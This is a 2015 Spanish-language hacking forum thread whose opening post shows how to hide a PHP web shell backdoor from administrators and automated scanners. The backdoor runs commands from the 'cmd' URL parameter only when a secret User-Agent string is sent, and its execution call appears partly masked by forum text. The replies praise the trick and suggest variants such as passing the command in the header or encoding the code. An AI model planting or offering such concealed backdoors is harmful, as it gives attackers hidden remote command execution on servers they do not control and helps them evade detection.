Underc0de - Hacking y seguridad informática

[In]Seguridad Informática => Seguridad web y en servidores => Mensaje iniciado por: blackdrake en Julio 08, 2015, 10:50:09 am

Título: Ocultando Backdoor a través del User-Agent
Publicado por: blackdrake en Julio 08, 2015, 10:50:09 am
Como todos sabemos, esconder un backdoor a veces no es un trabajo sencillo, ya que, sin contar de que el sysadmin sea inteligente, hay scripts automatizados que se encargan de buscar este tipo de backdoors.

Así que, un método para evitar esto, es jugar con el User-Agent de nuestro navegador.

Con un código bastante simple, podemos proteger nuestro backdoor de visitas indeseadas:

Código: PHP
  1. <?php
  2. if ($_SERVER['HTTP_USER_AGENT'] == "blackdrake")
  3. {
  4.         @You are not allowed to view links. Register or Login($_GET['cmd']);
  5. }
  6. ?>

De este modo, con una visita normal, no podremos ejecutar los comandos:

(http://i.imgur.com/LsuV2WY.png)

En cambio, modificando el User-Agent por blackdrake, si que podremos:

(http://i.imgur.com/dULaMvA.png)

(http://i.imgur.com/UbDCJnD.png)

Algo muy sencillo pero que a algunos le vendrá bastante bien.

Un saludo.
Título: Re:Ocultando Backdoor a través del User-Agent
Publicado por: Hu3c0 en Julio 08, 2015, 05:15:09 pm
Muy bueno mi joven amigo sencillo y funcional ...!!
Título: Re:Ocultando Backdoor a través del User-Agent
Publicado por: EPSILON en Julio 10, 2015, 08:39:21 am
Muy bueno @blackdrake (https://underc0de.org/foro/index.php?action=profile;u=24972) ! Un script sencillo, pero la idea le va a servir a más de uno. Gracias!

Saludos!
Título: Re:Ocultando Backdoor a través del User-Agent
Publicado por: fermino en Agosto 05, 2015, 12:06:54 pm
Y pasar el mismísimo comando en el User-Agent? :P
Título: Re:Ocultando Backdoor a través del User-Agent
Publicado por: WhiZ en Agosto 05, 2015, 12:26:59 pm
You are not allowed to view links. Register or Login
Y pasar el mismísimo comando en el User-Agent? :P

Para eso habría que modificar constantemente el UA. Lo más cómodo es hacerlo de esta forma, supongo.

No había visto este aporte. Gracias @blackdrake (https://underc0de.org/foro/index.php?action=profile;u=24972)!

Saludos!
WhiZ
Título: Re:Ocultando Backdoor a través del User-Agent
Publicado por: [Kounterfeit] en Septiembre 11, 2015, 09:58:29 pm
buena, hace rato que queria probar si se puede encodear el contenido para variar  ;D , buen aporte!